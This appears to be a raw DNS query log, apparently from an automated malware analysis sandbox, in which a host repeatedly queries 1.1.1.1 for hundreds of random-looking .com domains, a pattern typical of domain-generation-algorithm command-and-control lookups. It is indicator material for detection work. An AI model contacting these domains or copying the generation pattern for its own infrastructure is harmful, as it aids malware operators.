                                                                                                                                                                                                          Nov 11, 2024 18:24:54.389484882 CET192.168.2.81.1.1.10x2bb9Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.390428066 CET192.168.2.81.1.1.10x924eStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.400919914 CET192.168.2.81.1.1.10xd0afStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.427473068 CET192.168.2.81.1.1.10x9618Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.448486090 CET192.168.2.81.1.1.10xd06bStandard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.476851940 CET192.168.2.81.1.1.10x46c5Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.511444092 CET192.168.2.81.1.1.10x7f09Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.568222046 CET192.168.2.81.1.1.10xefe5Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:54.602427006 CET192.168.2.81.1.1.10xac06Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.218621016 CET192.168.2.81.1.1.10x537dStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219046116 CET192.168.2.81.1.1.10x159bStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.219340086 CET192.168.2.81.1.1.10x3d38Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.287945032 CET192.168.2.81.1.1.10xdce5Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.299238920 CET192.168.2.81.1.1.10x790bStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.398035049 CET192.168.2.81.1.1.10x2544Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.411056995 CET192.168.2.81.1.1.10x4446Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.589545965 CET192.168.2.81.1.1.10xc2e0Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:56.590857983 CET192.168.2.81.1.1.10x250bStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.602719069 CET192.168.2.81.1.1.10x94e3Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.604110956 CET192.168.2.81.1.1.10x3c34Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.606852055 CET192.168.2.81.1.1.10x55d2Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.614001036 CET192.168.2.81.1.1.10xc23fStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.631711006 CET192.168.2.81.1.1.10x5ff6Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.633816004 CET192.168.2.81.1.1.10x9663Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.633992910 CET192.168.2.81.1.1.10xd241Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.634186983 CET192.168.2.81.1.1.10xfc87Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.634352922 CET192.168.2.81.1.1.10x7ebeStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:59.637466908 CET192.168.2.81.1.1.10x56f3Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.464513063 CET192.168.2.81.1.1.10x4fc4Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.553632975 CET192.168.2.81.1.1.10x92ccStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.606688023 CET192.168.2.81.1.1.10x988dStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:00.707876921 CET192.168.2.81.1.1.10xc5aeStandard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:01.073718071 CET192.168.2.81.1.1.10x74fbStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:02.952713013 CET192.168.2.81.1.1.10x7c45Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.124716043 CET192.168.2.81.1.1.10x4a7cStandard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.329961061 CET192.168.2.81.1.1.10x1c2dStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.691922903 CET192.168.2.81.1.1.10xb57dStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.699822903 CET192.168.2.81.1.1.10xcce9Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.727994919 CET192.168.2.81.1.1.10x48f0Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.734913111 CET192.168.2.81.1.1.10xfbc9Standard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.743426085 CET192.168.2.81.1.1.10xb303Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:03.989797115 CET192.168.2.81.1.1.10xe7b1Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.027837992 CET192.168.2.81.1.1.10xb572Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.165056944 CET192.168.2.81.1.1.10xbb2fStandard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.187638998 CET192.168.2.81.1.1.10x88e1Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.190156937 CET192.168.2.81.1.1.10x53a8Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.319248915 CET192.168.2.81.1.1.10x578cStandard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.505903959 CET192.168.2.81.1.1.10x8b2bStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.516415119 CET192.168.2.81.1.1.10xc748Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.541640997 CET192.168.2.81.1.1.10x23d5Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:04.688436985 CET192.168.2.81.1.1.10x92a4Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.298027039 CET192.168.2.81.1.1.10xe071Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.316813946 CET192.168.2.81.1.1.10x3139Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.330466032 CET192.168.2.81.1.1.10x268aStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.334292889 CET192.168.2.81.1.1.10x2527Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.335695982 CET192.168.2.81.1.1.10x9e65Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.337727070 CET192.168.2.81.1.1.10xd296Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.337889910 CET192.168.2.81.1.1.10x4cd6Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.340759993 CET192.168.2.81.1.1.10x14d1Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360133886 CET192.168.2.81.1.1.10xcfcaStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360341072 CET192.168.2.81.1.1.10x4be5Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.360949039 CET192.168.2.81.1.1.10x304cStandard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.361351967 CET192.168.2.81.1.1.10x4115Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.361680984 CET192.168.2.81.1.1.10x2f66Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.365153074 CET192.168.2.81.1.1.10x9eb1Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.365633965 CET192.168.2.81.1.1.10x4cf6Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.366309881 CET192.168.2.81.1.1.10x1730Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369070053 CET192.168.2.81.1.1.10x207aStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369257927 CET192.168.2.81.1.1.10x465eStandard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369457006 CET192.168.2.81.1.1.10x409cStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.369699001 CET192.168.2.81.1.1.10x739fStandard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.370254040 CET192.168.2.81.1.1.10x718eStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371236086 CET192.168.2.81.1.1.10x9752Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371607065 CET192.168.2.81.1.1.10x5bcdStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.371809006 CET192.168.2.81.1.1.10x3521Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.372833014 CET192.168.2.81.1.1.10x8b86Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.373136997 CET192.168.2.81.1.1.10x6698Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.375039101 CET192.168.2.81.1.1.10x699eStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.375123978 CET192.168.2.81.1.1.10x868dStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376135111 CET192.168.2.81.1.1.10x42b4Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376317978 CET192.168.2.81.1.1.10x8594Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.376786947 CET192.168.2.81.1.1.10x2058Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377471924 CET192.168.2.81.1.1.10x343fStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377648115 CET192.168.2.81.1.1.10x5efStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.377804995 CET192.168.2.81.1.1.10x87d9Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.380645990 CET192.168.2.81.1.1.10x3ab4Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.382680893 CET192.168.2.81.1.1.10x45a4Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.387837887 CET192.168.2.81.1.1.10xef5fStandard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.388907909 CET192.168.2.81.1.1.10x8052Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.388907909 CET192.168.2.81.1.1.10x9fbdStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.389197111 CET192.168.2.81.1.1.10xf7e7Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.416491032 CET192.168.2.81.1.1.10xf3f7Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.439413071 CET192.168.2.81.1.1.10xf025Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.815486908 CET192.168.2.81.1.1.10xc849Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.816080093 CET192.168.2.81.1.1.10x498fStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.829379082 CET192.168.2.81.1.1.10x3219Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.830329895 CET192.168.2.81.1.1.10x8438Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.840501070 CET192.168.2.81.1.1.10x26f4Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.844216108 CET192.168.2.81.1.1.10xaf2cStandard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.845285892 CET192.168.2.81.1.1.10x9a74Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.845824003 CET192.168.2.81.1.1.10xbe7eStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.846559048 CET192.168.2.81.1.1.10xef32Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.847234011 CET192.168.2.81.1.1.10xbe3dStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.847683907 CET192.168.2.81.1.1.10xe4a6Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.848846912 CET192.168.2.81.1.1.10x34a7Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.849150896 CET192.168.2.81.1.1.10x68baStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.850310087 CET192.168.2.81.1.1.10xd61Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.850971937 CET192.168.2.81.1.1.10xd5aeStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.853105068 CET192.168.2.81.1.1.10xd073Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.854227066 CET192.168.2.81.1.1.10x1448Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.878551960 CET192.168.2.81.1.1.10x32c7Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.878997087 CET192.168.2.81.1.1.10x663fStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881402016 CET192.168.2.81.1.1.10x55e8Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.881630898 CET192.168.2.81.1.1.10x2912Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.883127928 CET192.168.2.81.1.1.10x448aStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896398067 CET192.168.2.81.1.1.10xd5f2Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896639109 CET192.168.2.81.1.1.10xadbStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896789074 CET192.168.2.81.1.1.10x3b6Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.896943092 CET192.168.2.81.1.1.10x4cdcStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897089005 CET192.168.2.81.1.1.10x2e48Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897238016 CET192.168.2.81.1.1.10x6100Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897382021 CET192.168.2.81.1.1.10xc82fStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897521973 CET192.168.2.81.1.1.10x12deStandard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897670984 CET192.168.2.81.1.1.10x4523Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897838116 CET192.168.2.81.1.1.10x7dffStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.897995949 CET192.168.2.81.1.1.10xb307Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.898221970 CET192.168.2.81.1.1.10x56cdStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.899300098 CET192.168.2.81.1.1.10x6d77Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.900965929 CET192.168.2.81.1.1.10x4dfbStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902208090 CET192.168.2.81.1.1.10x7802Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.902615070 CET192.168.2.81.1.1.10xf653Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.905914068 CET192.168.2.81.1.1.10x81baStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:05.936047077 CET192.168.2.81.1.1.10x74efStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037672043 CET192.168.2.81.1.1.10x38e0Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.037995100 CET192.168.2.81.1.1.10x709aStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.039777994 CET192.168.2.81.1.1.10x5e34Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.093453884 CET192.168.2.81.1.1.10x3957Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095330954 CET192.168.2.81.1.1.10xce1eStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.095972061 CET192.168.2.81.1.1.10xeb88Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.096726894 CET192.168.2.81.1.1.10xcab5Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.098848104 CET192.168.2.81.1.1.10x5a81Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:06.100832939 CET192.168.2.81.1.1.10x4b46Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.804033995 CET192.168.2.81.1.1.10xe4e4Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.805664062 CET192.168.2.81.1.1.10xbe24Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.808248997 CET192.168.2.81.1.1.10x5258Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.854455948 CET192.168.2.81.1.1.10xc4cdStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.855382919 CET192.168.2.81.1.1.10xa109Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.855806112 CET192.168.2.81.1.1.10x1f0Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.868700981 CET192.168.2.81.1.1.10xc6aeStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.880382061 CET192.168.2.81.1.1.10x40acStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.886480093 CET192.168.2.81.1.1.10x50a8Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.889904976 CET192.168.2.81.1.1.10x4df4Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.890583038 CET192.168.2.81.1.1.10xc29aStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.891304016 CET192.168.2.81.1.1.10xf460Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.891803980 CET192.168.2.81.1.1.10x15ebStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.892447948 CET192.168.2.81.1.1.10x6d67Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.893603086 CET192.168.2.81.1.1.10x248cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.894579887 CET192.168.2.81.1.1.10xbed8Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.899547100 CET192.168.2.81.1.1.10x8e83Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.900540113 CET192.168.2.81.1.1.10xeec4Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.915437937 CET192.168.2.81.1.1.10x5749Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.916169882 CET192.168.2.81.1.1.10xf256Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.917431116 CET192.168.2.81.1.1.10x50fbStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.918629885 CET192.168.2.81.1.1.10x5f76Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.918977976 CET192.168.2.81.1.1.10xac58Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.931562901 CET192.168.2.81.1.1.10xa0e5Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.931783915 CET192.168.2.81.1.1.10x379dStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.932173967 CET192.168.2.81.1.1.10xaa67Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.932379007 CET192.168.2.81.1.1.10x5cd0Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933085918 CET192.168.2.81.1.1.10x3818Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933264971 CET192.168.2.81.1.1.10x4dcbStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.933665991 CET192.168.2.81.1.1.10x6d41Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.934004068 CET192.168.2.81.1.1.10xea6Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.934283972 CET192.168.2.81.1.1.10xad7fStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.936465025 CET192.168.2.81.1.1.10x3704Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948272943 CET192.168.2.81.1.1.10x730aStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948497057 CET192.168.2.81.1.1.10xd7fcStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.948792934 CET192.168.2.81.1.1.10x4bbeStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950301886 CET192.168.2.81.1.1.10x2ca5Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950592041 CET192.168.2.81.1.1.10xae71Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.950774908 CET192.168.2.81.1.1.10xe75cStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.951070070 CET192.168.2.81.1.1.10x7f6dStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.951994896 CET192.168.2.81.1.1.10x42c3Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
